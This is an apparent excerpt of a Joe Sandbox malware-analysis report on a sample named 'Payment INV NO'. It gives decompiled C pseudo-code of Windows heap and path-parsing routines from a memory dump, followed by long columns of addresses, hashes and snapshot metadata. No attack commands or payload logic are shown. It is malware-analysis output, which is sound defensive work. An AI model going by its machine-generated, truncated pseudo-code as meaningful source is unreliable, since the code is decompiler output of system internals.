										_t353 =  *((intOrPtr*)(_t237 - 1));
										_t413 = _t237 - 8;
										_v101 = _t353;
										__eflags = _t353 - 5;
										_t354 = _v116;
										if(_t353 != 5) {
											_t414 = _v101;
											__eflags = _t414 & 0x00000040;
											if((_t414 & 0x00000040) == 0) {
												_t402 = 0;
												__eflags = 0;
											} else {
												_t402 = (_t414 & 0x3f) << 0x00000003 & 0x0000ffff;
												_t354 = _v116;
											}
										} else {
											_t402 = ( *(_t413 + 6) & 0x000000ff) << 0x00000003 & 0x0000ffff;
											_t354 = _v116;
										}
										_t443 = _t402 & 0x0000ffff;
										_v112 = _t443;
										_t444 = _t443 + _v128;
										__eflags = _t444 - _v128;
										_v136 = _t444;
										_t439 = _v132;
										_v120 = _t402;
										if(_t444 < _v128) {
											L145:
											_t442 = 0xc0000017;
											goto L146;
										} else {
											__eflags = _v101 - 5;
											_v128 = _v136;
											if(_v101 != 5) {
												_t416 = 0;
												__eflags = 0;
											} else {
												_t354 = _v116;
												_t416 = _t237 - 8 - (( *(_t237 - 2) & 0x000000ff) << 3) + 8;
											}
											_t402 = _t439;
											_t273 = L0183CB1E(_t354, _t439, _t237, 5, _t416);
											__eflags = _t273;
											if(_t273 >= 0) {
												_t355 =  *(_t450 + 7);
												__eflags = _t355 - 4;
												if(_t355 != 4) {
													__eflags = _t355 - 5;
													if(_t355 != 5) {
														__eflags = _t355 & 0x00000040;
														if((_t355 & 0x00000040) == 0) {
															__eflags = (_t355 & 0x0000003f) - 0x3f;
															if((_t355 & 0x0000003f) == 0x3f) {
																__eflags = _t355;
																if(_t355 >= 0) {
																	__eflags =  *(_t439 + 0x4c);
																	if( *(_t439 + 0x4c) == 0) {
																		_t276 =  *_t450 & 0x0000ffff;
																	} else {
																		_t286 =  *_t450;
																		__eflags =  *(_t439 + 0x4c) & _t286;
																		if(( *(_t439 + 0x4c) & _t286) != 0) {
																			_t286 = _t286 ^  *(_t439 + 0x50);
																			__eflags = _t286;
																		}
																		_t276 = _t286 & 0x0000ffff;
																	}
																} else {
																	_t363 = _t450 >> 0x00000003 ^  *_t450 ^ _t439 ^  *0x188874c;
																	__eflags = _t363;
																	if(_t363 == 0) {
																		_t288 = _t450 - (_t363 >> 0xd);
																		__eflags = _t288;
																		_t289 =  *_t288;
																	} else {
																		_t289 = 0;
																	}
																	_t276 =  *((intOrPtr*)(_t289 + 0x14));
																}
																_t356 =  *(_t450 + (_t276 & 0xffff) * 8 - 4);
															} else {
																_t356 = _t355 & 0x3f;
															}
														} else {
															_t356 =  *(_t450 + 4 + (_t355 & 0x3f) * 8) & 0x0000ffff;
														}
													} else {
														_t356 =  *(_t439 + 0x54) & 0x0000ffff ^  *(_t450 + 4) & 0x0000ffff;
													}
													__eflags =  *(_t450 + 7);
													if( *(_t450 + 7) >= 0) {
														__eflags =  *(_t439 + 0x4c);
														_v124 = 0;
														if( *(_t439 + 0x4c) == 0) {
															_t279 =  *_t450 & 0x0000ffff;
														} else {
															_t282 =  *_t450;
															__eflags =  *(_t439 + 0x4c) & _t282;
															if(( *(_t439 + 0x4c) & _t282) != 0) {
																_t282 = _t282 ^  *(_t439 + 0x50);
																__eflags = _t282;
															}
															_t279 = _t282 & 0x0000ffff;
														}
														_t417 = 0;
														__eflags = 0;
													} else {
														_v124 = 0x80;
														_t423 = _t450 >> 0x00000003 ^  *_t450 ^ _t439 ^  *0x188874c;
														__eflags = _t423;
														if(_t423 == 0) {
															_t284 = _t450 - (_t423 >> 0xd);
															__eflags = _t284;
															_t285 =  *_t284;
														} else {
															_t285 = 0;
														}
														_t279 =  *((intOrPtr*)(_t285 + 0x14));
														_t417 = 0x80;
													}
													_t357 = _t356 - _v112;
													_t280 = _t279 & 0x0000ffff;
													__eflags = _t357 - 0x3f;
													if(_t357 >= 0x3f) {
														_t418 = _t417 | 0x0000003f;
														__eflags = _t418;
														 *(_t450 + (_t280 & 0x0000ffff) * 8 - 4) = _t357;
														 *(_t450 + 7) = _t418;
													} else {
														 *(_t450 + 7) = _t357 | _v124;
													}
													L134:
													_t402 = _v108;
													L135:
													_t200 = _t450 + 8; // 0xddeeddf6
													_t237 = _t200;
													_v112 = _t200;
													goto L11;
												}
												_t402 = _v108;
												_t294 =  *(_t439 + 0x44) | _t402;
												__eflags = _t294 & 0x00000001;
												if((_t294 & 0x00000001) == 0) {
													E017AEEF0( *((intOrPtr*)(_t439 + 0xc8)));
													_t402 = _v108;
												}
												__eflags =  *(_t439 + 0x4c);
												if( *(_t439 + 0x4c) != 0) {
													_t426 =  *(_t439 + 0x50) ^  *_t450;
													 *_t450 = _t426;
													_t372 = _t426 >> 0x00000010 ^ _t426 >> 0x00000008 ^ _t426;
													__eflags = _t426 >> 0x18 - _t372;
													if(__eflags != 0) {
														_push(_t372);
														L0184FA2B(_t314, _t439, _t450, _t439, _t450, __eflags);
													}
													_t402 = _v108;
												}
												_t368 =  *_t450 - _v120;
												 *_t450 = _t368;
												__eflags =  *(_t439 + 0x4c);
												_t295 = _t368 & 0x0000ffff;
												if( *(_t439 + 0x4c) != 0) {
													 *(_t450 + 3) = _t295 >> 0x00000008 ^  *(_t450 + 2) ^ _t368;
													 *_t450 =  *_t450 ^  *(_t439 + 0x50);
													__eflags =  *_t450;
												}
												_t297 =  *(_t439 + 0x44) | _t402;
												__eflags = _t297 & 0x00000001;
												if((_t297 & 0x00000001) != 0) {
													goto L135;
												} else {
													E017AEB70(_t368,  *((intOrPtr*)(_t439 + 0xc8)));
													goto L134;
												}
											} else {
												_t442 = 0xc0000005;
												goto L146;
											}
										}
									} else {
										L76:
										_v101 = 0;
										L77:
										_push(_t343);
										_t402 = _t439;
										L0185A80D(_t439, _t450, _t237, 0);
										__eflags = _v101;
										if(_v101 != 0) {
											_t237 = _v112;
											_t402 = _v108;
											goto L80;
										}
										_t442 = 0xc000000d;
										goto L146;
									}
								}
								_t432 =  *(_t439 + 0x50) ^  *_t450;
								_v124 = _t432;
								_t398 = _v124;
								_t343 = _t398 >> 0x18;
								__eflags = _t343 - (_t432 >> 0x00000010 ^ _t432 >> 0x00000008 ^ _t398);
								if(_t343 != (_t432 >> 0x00000010 ^ _t432 >> 0x00000008 ^ _t398)) {
									goto L76;
								}
								L56:
								_t402 = _v108;
								goto L57;
							}
							_t343 = _t439;
							_t312 = L0185677F(_t314, _t343, _t450, _t450, __eflags);
							_v101 = _t312;
							__eflags = _t312;
							_t237 = _v112;
							if(_t312 != 0) {
								goto L56;
							}
							goto L77;
						}
						L11:
						_t346 = _t439;
						_t402 = E017B8F80(_t439, _t402 | 0x00000002, _t237, _v128);
						_t261 =  *0x1888664; // 0x0
						_v132 = _t402;
						if((_t261 & 0x00000001) != 0) {
							__eflags = _t261 & 0x00000002;
							if((_t261 & 0x00000002) == 0) {
								goto L12;
							}
							_t346 =  *[fs:0x30];
							__eflags =  *(_t346 + 0x18);
							if( *(_t346 + 0x18) == 0) {
								goto L12;
							}
							_push( *0x188634c);
							_t270 = L0185BD32( *0x1886348);
							__eflags = _t439 -  *_t270;
							if(_t439 ==  *_t270) {
								goto L12;
							}
							_t453 = _v112;
							__eflags = _t402;
							if(_t402 == 0) {
								L143:
								_v128 = _v128 - (_v120 & 0x0000ffff);
								__eflags = _v116;
								if(_v116 != 0) {
									E017C35D0(_t346, _t439, 0, _t453);
									_t266 = L01841EB6(_t439, _v108, _t453, _t346, _v120, _v116);
									_t402 = _t439;
									L0183CB1E(_v116, _t439, _t266, 6, _t453);
								}
								goto L145;
							}
							_t262 = _v108;
							__eflags = _t262 & 0x10000000;
							if((_t262 & 0x10000000) != 0) {
								L14:
								if(_t402 == 0) {
									goto L143;
								} else {
									_t349 = _v116;
									_t452 = _t402;
									if(_v116 != 0) {
										_t452 = L01841EB6(_t439, _t262, _t402, _t349, _v120, _t349);
										_t402 = _t439;
										L0183CB1E(_v116, _t439, _t452, 6, _v132);
									}
									goto L16;
								}
							}
							L01850C65(_t439, _t453);
							_t346 = _t439;
							L018502F7(_t439, _v132);
							_t402 = _v132;
							L13:
							_t262 = _v108;
							goto L14;
						}
						L12:
						_t453 = _v112;
						goto L13;
					}
					if((_t237 & 0x00000007) != 0) {
						_push(_t334);
						_push(0);
						_push(0);
						_push(_t237);
						L48:
						L0185A80D(_t439);
						_t450 = 0;
						__eflags = 0;
						goto L49;
					}
					_t454 = _t237 - 8;
					if( *((char*)(_t237 - 1)) == 5) {
						_t334 = ( *(_t454 + 6) & 0x000000ff) << 3;
						_t450 = _t454 - _t334;
					}
					if(( *(_t450 + 7) & 0x0000003f) == 0) {
						_push(_t334);
						_push(0);
						_push(0);
						_push(_t450);
						goto L48;
					} else {
						goto L9;
					}
				}
			}




































































































                                                          0x017b8e60
                                                          0x017b8e63
                                                          0x017b8e72
                                                          0x017b8e76
                                                          0x017b8e85
                                                          0x017b8e88
                                                          0x017b8e8b
                                                          0x017b8e8e
                                                          0x017b8e95
                                                          0x017b8e9d
                                                          0x017b8ea0
                                                          0x017b8ea4
                                                          0x017b8ea9
                                                          0x017b8eac
                                                          0x017b8eaf
                                                          0x017b8eb2
                                                          0x017b8eb7
                                                          0x01800655
                                                          0x01800664
                                                          0x01800667
                                                          0x017b8f67
                                                          0x017b8f6a
                                                          0x017b8f6d
                                                          0x017b8f79
                                                          0x017b8f79
                                                          0x017b8ec4
                                                          0x01800670
                                                          0x01800675
                                                          0x01800678
                                                          0x0180067b
                                                          0x0180067d
                                                          0x0180067f
                                                          0x01800686
                                                          0x01800689
                                                          0x0180068b
                                                          0x0180068b
                                                          0x0180068e
                                                          0x0180068e
                                                          0x01800689
                                                          0x01800691
                                                          0x01800698
                                                          0x0180069b
                                                          0x0180069d
                                                          0x018006a6
                                                          0x018006a6
                                                          0x0180069f
                                                          0x0180069f
                                                          0x018006a2
                                                          0x018006a2
                                                          0x018006a8
                                                          0x018006ab
                                                          0x018006ae
                                                          0x018006b1
                                                          0x01800771
                                                          0x01800773
                                                          0x01800776
                                                          0x01800778
                                                          0x00000000
                                                          0x00000000
                                                          0x0180077e
                                                          0x01800781
                                                          0x00000000
                                                          0x01800787
                                                          0x01800787
                                                          0x0180078e
                                                          0x01800791
                                                          0x01800793
                                                          0x01800797
                                                          0x0180079a
                                                          0x0180079d
                                                          0x0180079f
                                                          0x0180079f
                                                          0x018007a1
                                                          0x018007a1
                                                          0x018007a4
                                                          0x018007a7
                                                          0x018007a9
                                                          0x018007af
                                                          0x018007af
                                                          0x00000000
                                                          0x018007a9
                                                          0x018006b7
                                                          0x018006b7
                                                          0x018006b7
                                                          0x018006b9
                                                          0x018006c8
                                                          0x018006cd
                                                          0x018006cd
                                                          0x018006d6
                                                          0x018006d9
                                                          0x018006dc
                                                          0x018006e2
                                                          0x018006e7
                                                          0x018006eb
                                                          0x018006ee
                                                          0x018006f1
                                                          0x018006f9
                                                          0x018006ff
                                                          0x01800705
                                                          0x01800706
                                                          0x0180070d
                                                          0x01800714
                                                          0x0180071b
                                                          0x0180071e
                                                          0x01800725
                                                          0x0180072a
                                                          0x0180072c
                                                          0x01800731
                                                          0x01800733
                                                          0x01800736
                                                          0x0180073c
                                                          0x0180073e
                                                          0x01800748
                                                          0x0180074d
                                                          0x01800752
                                                          0x01800757
                                                          0x01800757
                                                          0x0180073e
                                                          0x00000000
                                                          0x01800736
                                                          0x018006f3
                                                          0x018006f7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018006f7
                                                          0x018006b1
                                                          0x017b8ecc
                                                          0x018007b6
                                                          0x018007b6
                                                          0x017b8ed4
                                                          0x018007c3
                                                          0x018007c3
                                                          0x017b8eda
                                                          0x017b8edd
                                                          0x017b8edf
                                                          0x017b8ee8
                                                          0x018007ce
                                                          0x018007cf
                                                          0x018007d2
                                                          0x00000000
                                                          0x017b8eee
                                                          0x017b8ef2
                                                          0x018007e5
                                                          0x01800818
                                                          0x01800818
                                                          0x0180081b
                                                          0x017b8f17
                                                          0x017b8f19
                                                          0x01800823
                                                          0x01800c3d
                                                          0x01800c4b
                                                          0x01800c51
                                                          0x01800c56
                                                          0x01800c5a
                                                          0x01800c5d
                                                          0x01800c65
                                                          0x01800c66
                                                          0x01800c69
                                                          0x01800c70
                                                          0x01800c77
                                                          0x01800c7e
                                                          0x01800c81
                                                          0x01800c88
                                                          0x01800c88
                                                          0x01800c8d
                                                          0x017b8f65
                                                          0x017b8f65
                                                          0x00000000
                                                          0x017b8f65
                                                          0x017b8f23
                                                          0x0180082d
                                                          0x01800831
                                                          0x0180084b
                                                          0x0180084f
                                                          0x01800878
                                                          0x01800878
                                                          0x0180087c
                                                          0x018008ac
                                                          0x018008b0
                                                          0x018008c1
                                                          0x018008b2
                                                          0x018008b2
                                                          0x018008b4
                                                          0x018008b7
                                                          0x018008b9
                                                          0x018008b9
                                                          0x018008b9
                                                          0x018008bc
                                                          0x018008bc
                                                          0x0180087e
                                                          0x01800887
                                                          0x0180088d
                                                          0x01800893
                                                          0x01800895
                                                          0x0180089b
                                                          0x018008a1
                                                          0x018008a1
                                                          0x018008a4
                                                          0x01800897
                                                          0x01800897
                                                          0x01800897
                                                          0x018008a6
                                                          0x018008a6
                                                          0x018008c4
                                                          0x018008cb
                                                          0x018008ce
                                                          0x018008d1
                                                          0x01800900
                                                          0x01800900
                                                          0x018008d3
                                                          0x018008d3
                                                          0x018008d7
                                                          0x018008e8
                                                          0x018008d9
                                                          0x018008d9
                                                          0x018008db
                                                          0x018008de
                                                          0x018008e0
                                                          0x018008e0
                                                          0x018008e0
                                                          0x018008e3
                                                          0x018008e3
                                                          0x018008f1
                                                          0x018008f5
                                                          0x018008f8
                                                          0x018008fb
                                                          0x018008fb
                                                          0x01800903
                                                          0x01800905
                                                          0x01800907
                                                          0x01800934
                                                          0x01800937
                                                          0x0180093a
                                                          0x01800940
                                                          0x00000000
                                                          0x00000000
                                                          0x01800946
                                                          0x01800949
                                                          0x0180094c
                                                          0x0180094f
                                                          0x01800952
                                                          0x01800955
                                                          0x01800967
                                                          0x0180096a
                                                          0x0180096d
                                                          0x01800983
                                                          0x01800983
                                                          0x0180096f
                                                          0x0180097b
                                                          0x0180097e
                                                          0x0180097e
                                                          0x01800957
                                                          0x0180095f
                                                          0x01800962
                                                          0x01800962
                                                          0x01800985
                                                          0x01800988
                                                          0x0180098b
                                                          0x0180098e
                                                          0x01800991
                                                          0x01800994
                                                          0x01800997
                                                          0x0180099a
                                                          0x01800c38
                                                          0x01800c38
                                                          0x00000000
                                                          0x018009a0
                                                          0x018009a0
                                                          0x018009a7
                                                          0x018009aa
                                                          0x018009c0
                                                          0x018009c0
                                                          0x018009ac
                                                          0x018009b8
                                                          0x018009bb
                                                          0x018009bb
                                                          0x018009c6
                                                          0x018009c8
                                                          0x018009cd
                                                          0x018009cf
                                                          0x018009db
                                                          0x018009de
                                                          0x018009e1
                                                          0x01800a70
                                                          0x01800a73
                                                          0x01800a81
                                                          0x01800a84
                                                          0x01800a97
                                                          0x01800a99
                                                          0x01800aa3
                                                          0x01800aa5
                                                          0x01800ace
                                                          0x01800ad2
                                                          0x01800ae3
                                                          0x01800ad4
                                                          0x01800ad4
                                                          0x01800ad6
                                                          0x01800ad9
                                                          0x01800adb
                                                          0x01800adb
                                                          0x01800adb
                                                          0x01800ade
                                                          0x01800ade
                                                          0x01800aa7
                                                          0x01800ab0
                                                          0x01800ab6
                                                          0x01800ab9
                                                          0x01800ac4
                                                          0x01800ac4
                                                          0x01800ac6
                                                          0x01800abb
                                                          0x01800abb
                                                          0x01800abb
                                                          0x01800ac8
                                                          0x01800ac8
                                                          0x01800aec
                                                          0x01800a9b
                                                          0x01800a9e
                                                          0x01800a9e
                                                          0x01800a86
                                                          0x01800a8c
                                                          0x01800a8c
                                                          0x01800a75
                                                          0x01800a7d
                                                          0x01800a7d
                                                          0x01800af0
                                                          0x01800af4
                                                          0x01800b29
                                                          0x01800b2d
                                                          0x01800b34
                                                          0x01800b45
                                                          0x01800b36
                                                          0x01800b36
                                                          0x01800b38
                                                          0x01800b3b
                                                          0x01800b3d
                                                          0x01800b3d
                                                          0x01800b3d
                                                          0x01800b40
                                                          0x01800b40
                                                          0x01800b48
                                                          0x01800b48
                                                          0x01800af6
                                                          0x01800af8
                                                          0x01800b06
                                                          0x01800b0c
                                                          0x01800b0f
                                                          0x01800b1a
                                                          0x01800b1a
                                                          0x01800b1c
                                                          0x01800b11
                                                          0x01800b11
                                                          0x01800b11
                                                          0x01800b1e
                                                          0x01800b22
                                                          0x01800b22
                                                          0x01800b4a
                                                          0x01800b4d
                                                          0x01800b50
                                                          0x01800b53
                                                          0x01800b60
                                                          0x01800b60
                                                          0x01800b63
                                                          0x01800b67
                                                          0x01800b55
                                                          0x01800b58
                                                          0x01800b58
                                                          0x01800b6a
                                                          0x01800b6a
                                                          0x01800b6d
                                                          0x01800b6d
                                                          0x01800b6d
                                                          0x01800b70
                                                          0x00000000
                                                          0x01800b70
                                                          0x018009ea
                                                          0x018009ed
                                                          0x018009ef
                                                          0x018009f1
                                                          0x018009f9
                                                          0x018009fe
                                                          0x018009fe
                                                          0x01800a01
                                                          0x01800a05
                                                          0x01800a0a
                                                          0x01800a0e
                                                          0x01800a1a
                                                          0x01800a1f
                                                          0x01800a21
                                                          0x01800a23
                                                          0x01800a28
                                                          0x01800a28
                                                          0x01800a2d
                                                          0x01800a2d
                                                          0x01800a33
                                                          0x01800a37
                                                          0x01800a3a
                                                          0x01800a3e
                                                          0x01800a41
                                                          0x01800a4b
                                                          0x01800a51
                                                          0x01800a51
                                                          0x01800a51
                                                          0x01800a56
                                                          0x01800a58
                                                          0x01800a5a
                                                          0x00000000
                                                          0x01800a60
                                                          0x01800a66
                                                          0x00000000
                                                          0x01800a66
                                                          0x018009d1
                                                          0x018009d1
                                                          0x00000000
                                                          0x018009d1
                                                          0x018009cf
                                                          0x01800909
                                                          0x01800909
                                                          0x01800909
                                                          0x0180090d
                                                          0x0180090d
                                                          0x01800912
                                                          0x01800919
                                                          0x0180091e
                                                          0x01800922
                                                          0x0180092e
                                                          0x01800931
                                                          0x00000000
                                                          0x01800931
                                                          0x01800924
                                                          0x00000000
                                                          0x01800924
                                                          0x01800907
                                                          0x01800856
                                                          0x01800858
                                                          0x01800865
                                                          0x0180086a
                                                          0x0180086d
                                                          0x0180086f
                                                          0x00000000
                                                          0x00000000
                                                          0x01800875
                                                          0x01800875
                                                          0x00000000
                                                          0x01800875
                                                          0x01800835
                                                          0x01800837
                                                          0x0180083c
                                                          0x0180083f
                                                          0x01800841
                                                          0x01800844
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01800846
                                                          0x017b8f29
                                                          0x017b8f31
                                                          0x017b8f38
                                                          0x017b8f3a
                                                          0x017b8f3f
                                                          0x017b8f44
                                                          0x01800b78
                                                          0x01800b7a
                                                          0x00000000
                                                          0x00000000
                                                          0x01800b80
                                                          0x01800b87
                                                          0x01800b8b
                                                          0x00000000
                                                          0x00000000
                                                          0x01800b91
                                                          0x01800b9d
                                                          0x01800ba2
                                                          0x01800ba4
                                                          0x00000000
                                                          0x00000000
                                                          0x01800baa
                                                          0x01800bad
                                                          0x01800baf
                                                          0x01800c00
                                                          0x01800c06
                                                          0x01800c09
                                                          0x01800c0d
                                                          0x01800c13
                                                          0x01800c25
                                                          0x01800c2d
                                                          0x01800c33
                                                          0x01800c33
                                                          0x00000000
                                                          0x01800c0d
                                                          0x01800bb1
                                                          0x01800bb4
                                                          0x01800bb9
                                                          0x017b8f50
                                                          0x017b8f52
                                                          0x00000000
                                                          0x017b8f58
                                                          0x017b8f58
                                                          0x017b8f5b
                                                          0x017b8f5f
                                                          0x01800bef
                                                          0x01800bf4
                                                          0x01800bf6
                                                          0x01800bf6
                                                          0x00000000
                                                          0x017b8f5f
                                                          0x017b8f52
                                                          0x01800bc3
                                                          0x01800bcb
                                                          0x01800bcd
                                                          0x01800bd2
                                                          0x017b8f4d
                                                          0x017b8f4d
                                                          0x00000000
                                                          0x017b8f4d
                                                          0x017b8f4a
                                                          0x017b8f4a
                                                          0x00000000
                                                          0x017b8f4a
                                                          0x017b8efa
                                                          0x01800804
                                                          0x01800805
                                                          0x01800807
                                                          0x01800809
                                                          0x0180080f
                                                          0x01800811
                                                          0x01800816
                                                          0x01800816
                                                          0x00000000
                                                          0x01800816
                                                          0x017b8f04
                                                          0x017b8f07
                                                          0x018007ed
                                                          0x018007f0
                                                          0x018007f0
                                                          0x017b8f11
                                                          0x018007f7
                                                          0x018007f8
                                                          0x018007fa
                                                          0x018007fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b8f11

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e608bbb6bebc4a745e831c32e2c6afde236a7bcbfe25cfcb13dbc1b65b786cfe
                                                          • Instruction ID: 978a111a035a1c892e499db91e496023b9625f06b2f794fba227693dd63f4864
                                                          • Opcode Fuzzy Hash: e608bbb6bebc4a745e831c32e2c6afde236a7bcbfe25cfcb13dbc1b65b786cfe
                                                          • Instruction Fuzzy Hash: 3932AE30A0075D8FEB6ACF69C8547BEBBF2AF84344F24411DE586DB681C734AA41CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E017B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x188d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E017CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E017B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = E017B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E017B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017B45F8))) {
												case 0:
													_v568 = 0x1771078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
